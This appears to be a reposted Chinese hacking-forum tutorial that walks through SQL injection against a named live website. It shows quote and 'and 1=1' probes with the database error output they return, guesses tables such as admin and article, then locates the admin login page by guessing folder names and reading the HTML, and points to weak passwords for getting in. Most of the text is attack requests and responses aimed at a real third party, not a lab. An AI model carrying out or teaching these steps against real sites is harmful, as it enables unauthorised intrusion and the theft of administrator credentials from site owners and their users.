| 关键词: china hack http admin www com 错误 代码 Asp 登陆 |
作者:枫三少 转自:黑基bbs原创作品版有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。这里我简单的介绍一个过程吧。首先我找到一个网站,是我们基地首页有连接的http://www.16china.com/hack/随便选择一个分页:http://www.16china.com/hack/SoftView.Asp?SoftID=139典型的ASP。看看能不能注射http://www.16china.com/hack/SoftView.Asp?SoftID=139'返回:Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp,行242 Microsoft JET Database Engine 错误 '80040e14' 字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 /hack/SoftView.Asp,行17 再来:http://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1返回正常网页。提交:http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0返回正常页/http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0同样正常。http://www.16china.com/hack/Soft ... )%20from%20article)>=0……象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台按以往的经验我采用:http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/我为什么不用http://www.16china.com/hack/admin.asphttp://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。http://www.16china.com/hack/admin返回信息:错误提示信息! 产生错误的可能原因:您没有进入本页面的权限!本次操作已被记录!可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.本页面为[管理员]专用,请先登陆后进入.返回上一页... /*说明登陆URL为常用的如:index.asp...*/查看HTML代码:<html><head><title>错误提示信息!</title>……<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.……找到了:http://www.16china.com/hack/admin/adminlogin.asp看看他的源代码告诉我们些什么:<html><head><title>管理员登陆</title>……………关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入http://www.16china.com/hack/admin/adminlogin.asp?action=login这里。只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|